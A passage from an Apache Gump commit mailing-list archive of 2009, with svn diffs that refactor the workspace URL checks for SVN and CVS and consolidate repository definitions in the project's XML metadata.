gump/trunk/python/gump/core/update/scmupdater.py (original) +++ gump/trunk/python/gump/core/update/scmupdater.py Thu Feb 26 06:06:31 2009 @@ -25,6 +25,7 @@ from gump.core.run.gumprun import RunSpecific from gump.util.process.launcher import execute from gump.util.tools import wipeDirectoryTree +from gump.util.process.command import getCmdFromString def should_be_quiet(module): """ @@ -36,6 +37,29 @@ and not module.getScm().isDebug() \ and not module.getScm().isVerbose() +def match_workspace_template(module, cmd_string, extract_url, + expectedURL = None): + """ + Template for the common run-a-command-and-extract-URL-from-output logic + for workspaceMatchesModule Method of ScmUpdater + """ + if not expectedURL: + expectedURL = module.getScm().getRootUrl() + + cmd = getCmdFromString(cmd_string, 'check_workspace_' + module.getName(), + module.getSourceControlStagingDirectory()) + + result = execute(cmd) + + if not result.isOk(): + return (False, cmd_string + ' returned ' + str(result.exit_code)) + + elif not result.hasOutput(): + return (False, cmd_string + ' didn\'t return any output.') + + actualURL = extract_url(result) + return (expectedURL == actualURL, 'Expected URL \'' + expectedURL + \ + '\' but working copy was \'' + actualURL + '\'') ############################################################################### # Classes Modified: gump/trunk/python/gump/core/update/svn.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/update/svn.py?rev=748028&r1=748027&r2=748028&view=diff ============================================================================== --- gump/trunk/python/gump/core/update/svn.py (original) +++ gump/trunk/python/gump/core/update/svn.py Thu Feb 26 06:06:31 2009 @@ -20,9 +20,9 @@ import StringIO from gump import log -from gump.core.update.scmupdater import ScmUpdater, should_be_quiet +from gump.core.update.scmupdater import match_workspace_template, ScmUpdater, \ + should_be_quiet from gump.util.process.command import Cmd -from gump.util.process.launcher import execute from gump.util.tools import catFile def getCommand(module, forUpdate): @@ -75,6 +75,19 @@ URL_REGEX = re.compile('^URL:\s+(.*)\s*$', re.MULTILINE | re.UNICODE) +def extract_URL(result): + """ + Extracs the URL from 'svn info' output + """ + stream = StringIO.StringIO() + catFile(stream, result.getOutput()) + output = stream.getvalue() + stream.close() + match = URL_REGEX.search(output) + if not match: + return 'Couldn\'t find URL in svn info output ' + output + return match.group(1) + ############################################################################### # Classes ############################################################################### @@ -104,31 +117,6 @@ """ Run svn info to see whether the URL matches """ - cmd = Cmd('svn', 'check_workspace_' + module.getName(), - module.getSourceControlStagingDirectory()) - cmd.addParameter('info') - - result = execute(cmd) - - output = None - if result.hasOutput(): - stream = StringIO.StringIO() - catFile(stream, result.getOutput()) - output = stream.getvalue() - stream.close() - - if not result.isOk(): - return (False, 'svn info returned ' + str(result.exit_code)) - - elif not output: - return (False, 'svn info didn\'t return any output.') - - match = URL_REGEX.search(output) - if not match: - return (False, 'Couldn\'t find URL in svn info output ' + output) - - expectedURL = module.getScm().getRootUrl().rstrip('/') - actualURL = match.group(1) - - return (expectedURL == actualURL, 'Expected URL \'' + expectedURL + \ - '\' but working copy was \'' + actualURL + '\'') + return match_workspace_template(module, 'svn info', extract_URL, + module.getScm().getRootUrl() \ + .rstrip('/')) Modified: gump/trunk/python/gump/util/process/command.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/util/process/command.py?rev=748028&r1=748027&r2=748028&view=diff ============================================================================== --- gump/trunk/python/gump/util/process/command.py (original) +++ gump/trunk/python/gump/util/process/command.py Thu Feb 26 06:06:31 2009 @@ -221,12 +221,12 @@ def dump(self,indent=''): print self.overview(indent) -def getCmdFromString(strcmd,name=None): +def getCmdFromString(strcmd, name = None, cwd = None): """Extract a Cmd Object from a String""" parts = split(strcmd,' ') cmdcmd = parts[0] if not name: name = cmdcmd - cmd = Cmd(cmdcmd,name) + cmd = Cmd(cmdcmd, name, cwd) for i in range(1,len(parts)): if parts[i]: cmd.addParameterObject(getParameterFromString(parts[i])) From [email protected] Fri Feb 27 08:44:09 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 75966 invoked from network); 27 Feb 2009 08:44:09 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 27 Feb 2009 08:44:09 -0000 Received: (qmail 9921 invoked by uid 500); 27 Feb 2009 08:44:09 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 9912 invoked by uid 99); 27 Feb 2009 08:44:08 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 27 Feb 2009 00:44:08 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 27 Feb 2009 08:44:07 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id D88452388870; Fri, 27 Feb 2009 08:43:47 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r748428 - in /gump/metadata: profile/ project/ repository/ Date: Fri, 27 Feb 2009 08:43:47 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Fri Feb 27 08:43:46 2009 New Revision: 748428 URL: http://svn.apache.org/viewvc?rev=748428&view=rev Log: remove unused repositories and project-less modules Removed: gump/metadata/project/avalon-sandbox.xml gump/metadata/repository/activemq.xml gump/metadata/repository/antworks.xml gump/metadata/repository/avalon.xml gump/metadata/repository/cocoon.xml gump/metadata/repository/codehaus.xml gump/metadata/repository/codehaus_projects.xml gump/metadata/repository/codehaus_scm.xml gump/metadata/repository/db.xml gump/metadata/repository/exolab.xml gump/metadata/repository/geronimo.xml gump/metadata/repository/gleamynode.xml gump/metadata/repository/icu-project.xml gump/metadata/repository/incubator.xml gump/metadata/repository/jakarta.xml gump/metadata/repository/jamonapi.xml gump/metadata/repository/myfaces.xml gump/metadata/repository/struts-svn.xml gump/metadata/repository/w3c.xml gump/metadata/repository/ws-fx.xml gump/metadata/repository/ws.xml gump/metadata/repository/xml.xml Modified: gump/metadata/profile/gump.xml Modified: gump/metadata/profile/gump.xml URL: http://svn.apache.org/viewvc/gump/metadata/profile/gump.xml?rev=748428&r1=748427&r2=748428&view=diff ============================================================================== --- gump/metadata/profile/gump.xml (original) +++ gump/metadata/profile/gump.xml Fri Feb 27 08:43:46 2009 @@ -35,10 +35,6 @@ <!--module href="http://svn.apache.org/repos/asf/avalon/trunk/central/system/gump/avalon-trunk.xml"/--> <module href="project/avalon.xml"/> -<!-- Apache.Avalon (CVS) --> - - <module href="project/avalon-sandbox.xml"/> - <!-- Apache.Cocoon --> <module href="project/cocoon.xml"/> @@ -132,7 +128,7 @@ <module href="project/jakarta-servletapi.xml"/> <module href="project/jakarta-site2.xml"/> <module href="project/jakarta-slide.xml"/> - <module href="project/struts.xml"/> + <!--module href="project/struts.xml"/--> <module href="project/packaged-struts12.xml"/> <module href="project/packaged-struts13.xml"/> <module href="project/packaged-struts-el12.xml"/> @@ -625,62 +621,46 @@ <!-- Repository definitions --> - <repository href="repository/activemq.xml"/> <repository href="repository/ant.xml"/> <repository href="repository/antbook.xml"/> - <repository href="repository/antworks.xml"/> <repository href="repository/aopalliance.xml"/> - <repository href="repository/apr.xml"/> <repository href="repository/apache-httpd.xml"/> <repository href="repository/apache-incubator-svn.xml"/> + <repository href="repository/apr.xml"/> <repository href="repository/asf.xml"/> - <repository href="repository/avalon.xml"/> <repository href="repository/avalon-svn.xml"/> - <repository href="repository/barcode4j.xml"/> + <!--repository href="repository/barcode4j.xml"/--> <repository href="repository/beaver.xml"/> <repository href="repository/beepcore.xml"/> + <repository href="repository/cargo.xml"/> <repository href="repository/castor.xml"/> - <repository href="repository/cocoon.xml"/> <repository href="repository/cocoondev.xml"/> - <repository href="repository/lenya.xml"/> - <repository href="repository/lucene.xml"/> - <repository href="repository/cargo.xml"/> - <repository href="repository/codehaus.xml"/> - <repository href="repository/codehaus_annogen.xml"/> - <repository href="repository/codehaus_scm.xml"/> - <repository href="repository/codehaus_projects.xml"/> <repository href="repository/codehaus-svn.xml"/> + <repository href="repository/codehaus_annogen.xml"/> <repository href="repository/commons-svn.xml"/> - <repository href="repository/db.xml"/> <repository href="repository/db-svn.xml"/> <repository href="repository/dbxml.xml"/> <repository href="repository/directory.xml"/> - <repository href="repository/exolab.xml"/> <repository href="repository/excalibur-svn.xml"/> <repository href="repository/forrest.xml"/> - <repository href="repository/geronimo.xml"/> <repository href="repository/ggf-cddlm.xml"/> - <repository href="repository/gleamynode.xml"/> <repository href="repository/gump.xml"/> <repository href="repository/hamcrest.xml"/> <repository href="repository/httpcomponents.xml"/> - <repository href="repository/icu-project.xml"/> <repository href="repository/ikayzo.xml"/> - <repository href="repository/incubator.xml"/> <repository href="repository/jacorb.xml"/> - <repository href="repository/jakarta.xml"/> <repository href="repository/jakarta-svn.xml"/> <repository href="repository/james.xml"/> - <repository href="repository/jamonapi.xml"/> <repository href="repository/javanet.xml"/> <repository href="repository/jboss.xml"/> <repository href="repository/jdom.xml"/> <repository href="repository/junit.xml"/> + <repository href="repository/lenya.xml"/> <repository href="repository/logging.xml"/> + <repository href="repository/lucene.xml"/> <repository href="repository/maven.xml"/> <repository href="repository/mina.xml"/> <repository href="repository/mozilla.xml"/> - <repository href="repository/myfaces.xml"/> <repository href="repository/objectweb.xml"/> <repository href="repository/opensaml.xml"/> <repository href="repository/pcre.xml"/> @@ -688,29 +668,20 @@ <repository href="repository/portals.xml"/> <repository href="repository/slf4j.xml" /> <repository href="repository/smartfrog.xml" /> - <repository href="repository/sourceforge.xml"/> - <!-- - sourceforge-svn no longer valid - see https://sourceforge.net/docs/E09#notice - <repository href="repository/sourceforge-svn.xml"/> - --> <repository href="repository/sourceforge-ant-contrib.xml"/> <repository href="repository/sourceforge-mx4j.xml"/> <repository href="repository/sourceforge-xmlunit.xml"/> - <repository href="repository/struts-svn.xml"/> + <repository href="repository/sourceforge.xml"/> <repository href="repository/testng.xml" /> <repository href="repository/tigris.xml"/> <repository href="repository/tomcat.xml" /> <repository href="repository/turbine.xml" /> <repository href="repository/webservices.xml"/> - <repository href="repository/w3c.xml"/> - <repository href="repository/ws.xml"/> - <repository href="repository/ws-fx.xml"/> <repository href="repository/xalan.xml"/> <repository href="repository/xerces.xml"/> - <repository href="repository/xml.xml"/> - <repository href="repository/xmlgraphics.xml"/> <repository href="repository/xml-svn.xml"/> <repository href="repository/xmlbeans.xml"/> + <repository href="repository/xmlgraphics.xml"/> <repository href="repository/xpp.xml"/> <repository href="repository/xstream.xml"/> From [email protected] Fri Feb 27 19:58:44 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 96062 invoked from network); 27 Feb 2009 19:58:44 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 27 Feb 2009 19:58:44 -0000 Received: (qmail 59711 invoked by uid 500); 27 Feb 2009 19:58:44 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 59702 invoked by uid 99); 27 Feb 2009 19:58:44 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 27 Feb 2009 11:58:44 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 27 Feb 2009 19:58:42 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id E4038238889F; Fri, 27 Feb 2009 19:58:20 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r748661 - /gump/trunk/python/gump/core/update/cvs.py Date: Fri, 27 Feb 2009 19:58:20 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Fri Feb 27 19:58:20 2009 New Revision: 748661 URL: http://svn.apache.org/viewvc?rev=748661&view=rev Log: allow CVS to detect a bad working copy Modified: gump/trunk/python/gump/core/update/cvs.py Modified: gump/trunk/python/gump/core/update/cvs.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/update/cvs.py?rev=748661&r1=748660&r2=748661&view=diff ============================================================================== --- gump/trunk/python/gump/core/update/cvs.py (original) +++ gump/trunk/python/gump/core/update/cvs.py Fri Feb 27 19:58:20 2009 @@ -15,9 +15,12 @@ # See the License for the specific language governing permissions and # limitations under the License. +import os.path + from gump.core.model.workspace import Cmd from gump.core.update.scmupdater import ScmUpdater, should_be_quiet from gump.tool.integration.cvs import readLogins, loginToRepositoryOnDemand +from gump.util.tools import tailFileToString def maybe_add_tag(module, cmd): # Determine if a tag is set, on <cvs or on <module @@ -40,6 +43,16 @@ # Set the CVS root cmd.addParameter('-d', module.getScm().getCvsRoot()) +def error_unless_file_content_matches(cvsdir, filename, expected_content, + prop): + f = os.path.join(cvsdir, filename) + if not os.path.exists(f): + return (False, 'workspace doesn\'t contain a ' + filename + ' file') + actual = tailFileToString(f, 1).rstrip() + if actual != expected_content: + return (False, 'expected ' + prop + ' to be \'' + \ + expected_content + '\' but is \'' + actual + '\'') + return None ############################################################################### # Classes @@ -103,6 +116,49 @@ return cmd + def workspaceMatchesModule(self, module): + """ + look for a CVS directory and the files contained therein, try to match + the contents of said files + """ + cvsdir = os.path.join(module.getSourceControlStagingDirectory(), + 'CVS') + if not os.path.exists(cvsdir): + return (False, 'workspace doesn\'t contain a CVS directory') + + root = error_unless_file_content_matches(cvsdir, 'Root', + module.getScm().getCvsRoot(), + 'CVSROOT') + if root: + return root + + expected_module = module.getName() + if module.getScm().hasModule(): + expected_module = module.getScm().getModule() + rep = error_unless_file_content_matches(cvsdir, 'Repository', + expected_module, 'Module') + if rep: + return rep + + if module.getScm().hasTag() or module.hasTag(): + expected_tag = None + if module.getScm().hasTag(): + expected_tag = module.getScm().getTag() + elif module.hasTag(): + expected_tag = module.getTag() + tag = error_unless_file_content_matches(cvsdir, 'Tag', + expected_tag, 'Tag') + if tag: + return tag + + elif os.path.exists(os.path.join(cvsdir, 'Tag')): + return (False, 'workspace is tagged with \'' + \ + tailFileToString(os.path.join(cvsdir, 'Tag'), + 1).rstrip() + \ + '\' but shouldn\'t have a [email protected].') + + return (True, '') + def maybeLogin(self, module): repository = module.repository root = module.getScm().getCvsRoot() From [email protected] Fri Feb 27 20:00:46 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 97152 invoked from network); 27 Feb 2009 20:00:46 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 27 Feb 2009 20:00:46 -0000 Received: (qmail 61036 invoked by uid 500); 27 Feb 2009 20:00:45 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 61027 invoked by uid 99); 27 Feb 2009 20:00:45 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 27 Feb 2009 12:00:45 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 27 Feb 2009 20:00:45 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 14DE723888F1; Fri, 27 Feb 2009 20:00:25 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r748667 - /gump/metadata/project/xstream.xml Date: Fri, 27 Feb 2009 20:00:24 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Fri Feb 27 20:00:24 2009 New Revision: 748667 URL: http://svn.apache.org/viewvc?rev=748667&view=rev Log: remove redundant dot Modified: gump/metadata/project/xstream.xml Modified: gump/metadata/project/xstream.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/xstream.xml?rev=748667&r1=748666&r2=748667&view=diff ============================================================================== --- gump/metadata/project/xstream.xml (original) +++ gump/metadata/project/xstream.xml Fri Feb 27 20:00:24 2009 @@ -22,7 +22,7 @@ <description>simple library to serialize object to XML and back again</description> - <svn repository="xstream" dir="."/> + <svn repository="xstream"/> <project name="xstream"> <package>com.thoughtworks.xstream</package> From [email protected] Fri Feb 27 20:07:19 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 99683 invoked from network); 27 Feb 2009 20:07:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 27 Feb 2009 20:07:18 -0000 Received: (qmail 66957 invoked by uid 500); 27 Feb 2009 20:07:18 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 66948 invoked by uid 99); 27 Feb 2009 20:07:18 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 27 Feb 2009 12:07:18 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 27 Feb 2009 20:07:16 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id A9F9A238889F; Fri, 27 Feb 2009 20:06:55 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r748678 - /gump/metadata/project/cargo.xml Date: Fri, 27 Feb 2009 20:06:55 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Fri Feb 27 20:06:54 2009 New Revision: 748678 URL: http://svn.apache.org/viewvc?rev=748678&view=rev Log: remove redundant dot Modified: gump/metadata/project/cargo.xml Modified: gump/metadata/project/cargo.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/cargo.xml?rev=748678&r1=748677&r2=748678&view=diff ============================================================================== --- gump/metadata/project/cargo.xml (original) +++ gump/metadata/project/cargo.xml Fri Feb 27 20:06:54 2009 @@ -23,7 +23,7 @@ Cargo provides a Java API to manipulate Java Containers </description> - <svn repository="cargo" dir="."/> + <svn repository="cargo"/> <project name="cargo"> From [email protected] Fri Feb 27 20:29:43 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 9044 invoked from network); 27 Feb 2009 20:29:43 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 27 Feb 2009 20:29:43 -0000 Received: (qmail 95004 invoked by uid 500); 27 Feb 2009 20:29:43 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 94993 invoked by uid 99); 27 Feb 2009 20:29:43 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 27 Feb 2009 12:29:43 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 27 Feb 2009 20:29:40 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 209B123889B2; Fri, 27 Feb 2009 20:29:19 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r748685 - in /gump/metadata: profile/ project/ repository/ testbase/ Date: Fri, 27 Feb 2009 20:29:18 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Fri Feb 27 20:29:17 2009 New Revision: 748685 URL: http://svn.apache.org/viewvc?rev=748685&view=rev Log: start consolidating ASF repos into a single one Removed: gump/metadata/repository/ant.xml gump/metadata/repository/apache-httpd.xml gump/metadata/repository/apache-incubator-svn.xml gump/metadata/repository/apr.xml gump/metadata/repository/xml-svn.xml gump/metadata/repository/xmlbeans.xml gump/metadata/repository/xmlgraphics.xml Modified: gump/metadata/profile/gump.xml gump/metadata/project/ant-antlibs-sandbox.xml gump/metadata/project/ant-antlibs.xml gump/metadata/project/ant.xml gump/metadata/project/apache-httpd.xml gump/metadata/project/apr-iconv.xml gump/metadata/project/apr-util.xml gump/metadata/project/apr.xml gump/metadata/project/ivy.xml gump/metadata/project/rat.xml gump/metadata/project/xml-apis-12.xml gump/metadata/project/xml-batik.xml gump/metadata/project/xml-commons.xml gump/metadata/project/xml-fop-maintenance.xml gump/metadata/project/xml-fop.xml gump/metadata/project/xml-security.xml gump/metadata/project/xml-site.xml gump/metadata/project/xml-stylebook.xml gump/metadata/project/xml-xindice.xml gump/metadata/project/xml-xmlbeans.xml gump/metadata/project/xmlgraphics-commons.xml gump/metadata/testbase/profile.xml Modified: gump/metadata/profile/gump.xml URL: http://svn.apache.org/viewvc/gump/metadata/profile/gump.xml?rev=748685&r1=748684&r2=748685&view=diff ============================================================================== --- gump/metadata/profile/gump.xml (original) +++ gump/metadata/profile/gump.xml Fri Feb 27 20:29:17 2009 @@ -621,12 +621,8 @@ <!-- Repository definitions --> - <repository href="repository/ant.xml"/> <repository href="repository/antbook.xml"/> <repository href="repository/aopalliance.xml"/> - <repository href="repository/apache-httpd.xml"/> - <repository href="repository/apache-incubator-svn.xml"/> - <repository href="repository/apr.xml"/> <repository href="repository/asf.xml"/> <repository href="repository/avalon-svn.xml"/> <!--repository href="repository/barcode4j.xml"/--> @@ -679,9 +675,6 @@ <repository href="repository/webservices.xml"/> <repository href="repository/xalan.xml"/> <repository href="repository/xerces.xml"/> - <repository href="repository/xml-svn.xml"/> - <repository href="repository/xmlbeans.xml"/> - <repository href="repository/xmlgraphics.xml"/> <repository href="repository/xpp.xml"/> <repository href="repository/xstream.xml"/> Modified: gump/metadata/project/ant-antlibs-sandbox.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/ant-antlibs-sandbox.xml?rev=748685&r1=748684&r2=748685&view=diff ============================================================================== --- gump/metadata/project/ant-antlibs-sandbox.xml (original) +++ gump/metadata/project/ant-antlibs-sandbox.xml Fri Feb 27 20:29:17 2009 @@ -22,7 +22,7 @@ Task and Type Libraries for Apache Ant </description> - <svn repository="ant" dir="sandbox/antlibs/all-trunks"/> + <svn repository="asf" dir="ant/sandbox/antlibs/all-trunks"/> <project name="http-antlib"> <package>org.apache.ant.http</package> Modified: gump/metadata/project/ant-antlibs.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/ant-antlibs.xml?rev=748685&r1=748684&r2=748685&view=diff ============================================================================== --- gump/metadata/project/ant-antlibs.xml (original) +++ gump/metadata/project/ant-antlibs.xml Fri Feb 27 20:29:17 2009 @@ -22,7 +22,7 @@ Task and Type Libraries for Apache Ant </description> - <svn repository="ant" dir="antlibs/all-trunks"/> + <svn repository="asf" dir="ant/antlibs/all-trunks"/> <project name="antunit"> <package>org.apache.ant.antunit</package> Modified: gump/metadata/project/ant.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/ant.xml?rev=748685&r1=748684&r2=748685&view=diff ============================================================================== --- gump/metadata/project/ant.xml (original) +++ gump/metadata/project/ant.xml Fri Feb 27 20:29:17 2009 @@ -22,7 +22,7 @@ Java based build tool </description> - <svn repository="ant" dir="core/trunk"/> + <svn repository="asf" dir="ant/core/trunk"/> <project name="jakarta-ant"> <depend project="ant" inherit="jars"/> Modified: gump/metadata/project/apache-httpd.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/apache-httpd.xml?rev=748685&r1=748684&r2=748685&view=diff ============================================================================== --- gump/metadata/project/apache-httpd.xml (original) +++ gump/metadata/project/apache-httpd.xml Fri Feb 27 20:29:17 2009 @@ -23,7 +23,7 @@ Apache HTTP Server </description> - <svn repository="apache-httpd" dir="httpd/trunk"/> + <svn repository="asf" dir="httpd/httpd/trunk"/> <project name="apache-httpd-buildconf"> <script name="buildconf"> Modified: gump/metadata/project/apr-iconv.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/apr-iconv.xml?rev=748685&r1=748684&r2=748685&view=diff ============================================================================== --- gump/metadata/project/apr-iconv.xml (original) +++ gump/metadata/project/apr-iconv.xml Fri Feb 27 20:29:17 2009 @@ -23,7 +23,7 @@ Apache Portable Runtime </description> - <svn repository="apr" dir="apr-iconv/trunk"/> + <svn repository="asf" dir="apr/apr-iconv/trunk"/> <project name="apr-iconv-buildconf"> <script name="buildconf"> Modified: gump/metadata/project/apr-util.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/apr-util.xml?rev=748685&r1=748684&r2=748685&view=diff ============================================================================== --- gump/metadata/project/apr-util.xml (original) +++ gump/metadata/project/apr-util.xml Fri Feb 27 20:29:17 2009 @@ -23,7 +23,7 @@ Apache Portable Runtime </description> - <svn repository="apr" dir="apr-util/trunk"/> + <svn repository="asf" dir="apr/apr-util/trunk"/> <project name="apr-util-buildconf"> <script name="buildconf"> Modified: gump/metadata/project/apr.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/apr.xml?rev=748685&r1=748684&r2=748685&view=diff ============================================================================== --- gump/metadata/project/apr.xml (original) +++ gump/metadata/project/apr.xml Fri Feb 27 20:29:17 2009 @@ -23,7 +23,7 @@ Apache Portable Runtime </description> - <svn repository="apr" dir="apr/trunk"/> + <svn repository="asf" dir="apr/apr/trunk"/> <project name="apr-buildconf"> <script name="buildconf"/> Modified: gump/metadata/project/ivy.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/ivy.xml?rev=748685&r1=748684&r2=748685&view=diff ============================================================================== --- gump/metadata/project/ivy.xml (original) +++ gump/metadata/project/ivy.xml Fri Feb 27 20:29:17 2009 @@ -22,7 +22,7 @@ Ivy is a tool for managing (recording, tracking, resolving and reporting) project dependencies. </description> - <svn repository="ant" dir="ivy/core/trunk"/> + <svn repository="asf" dir="ant/ivy/core/trunk"/> <project name="ivy"> <package>org.apache.ivy</package> Modified: gump/metadata/project/rat.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/rat.xml?rev=748685&r1=748684&r2=748685&view=diff ============================================================================== --- gump/metadata/project/rat.xml (original) +++ gump/metadata/project/rat.xml Fri Feb 27 20:29:17 2009 @@ -22,7 +22,7 @@ Release Audit Tool </description> - <svn repository="apache-incubator-svn" dir="rat/main/trunk"/> + <svn repository="asf" dir="incubator/rat/main/trunk"/> <project name="rat"> <package>org.apache.rat</package> Modified: gump/metadata/project/xml-apis-12.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/xml-apis-12.xml?rev=748685&r1=748684&r2=748685&view=diff ============================================================================== --- gump/metadata/project/xml-apis-12.xml (original) +++ gump/metadata/project/xml-apis-12.xml Fri Feb 27 20:29:17 2009 @@ -21,7 +21,7 @@ DOM,SAX,JAXP; plus xml utilities, JAXP 1.2.0 </description> - <svn repository="xml-svn" dir="commons/branches/tck-jaxp-1_2_0/java/external"/> + <svn repository="asf" dir="xml/commons/branches/tck-jaxp-1_2_0/java/external"/> <project name="xml-apis-12"> <package>javax.xml.parsers</package> Modified: gump/metadata/project/xml-batik.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/xml-batik.xml?rev=748685&r1=748684&r2=748685&view=diff ============================================================================== --- gump/metadata/project/xml-batik.xml (original) +++ gump/metadata/project/xml-batik.xml Fri Feb 27 20:29:17 2009 @@ -22,7 +22,7 @@ Scalable Vector Graphics </description> - <svn repository="xmlgraphics" dir="batik/trunk/"/> + <svn repository="asf" dir="xmlgraphics/batik/trunk/"/> <project name="xml-batik"> <package>org.apache.batik</package> Modified: gump/metadata/project/xml-commons.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/xml-commons.xml?rev=748685&r1=748684&r2=748685&view=diff ============================================================================== --- gump/metadata/project/xml-commons.xml (original) +++ gump/metadata/project/xml-commons.xml Fri Feb 27 20:29:17 2009 @@ -21,7 +21,7 @@ Apache XML Commons - externally defined standards - DOM,SAX,JAXP; plus xml utilities </description> - <svn repository="xml-svn" dir="commons/trunk"/> + <svn repository="asf" dir="xml/commons/trunk"/> <project name="xml-apis" groupId="xml-apis"> <package>javax.xml.parsers</package> Modified: gump/metadata/project/xml-fop-maintenance.xml URL: 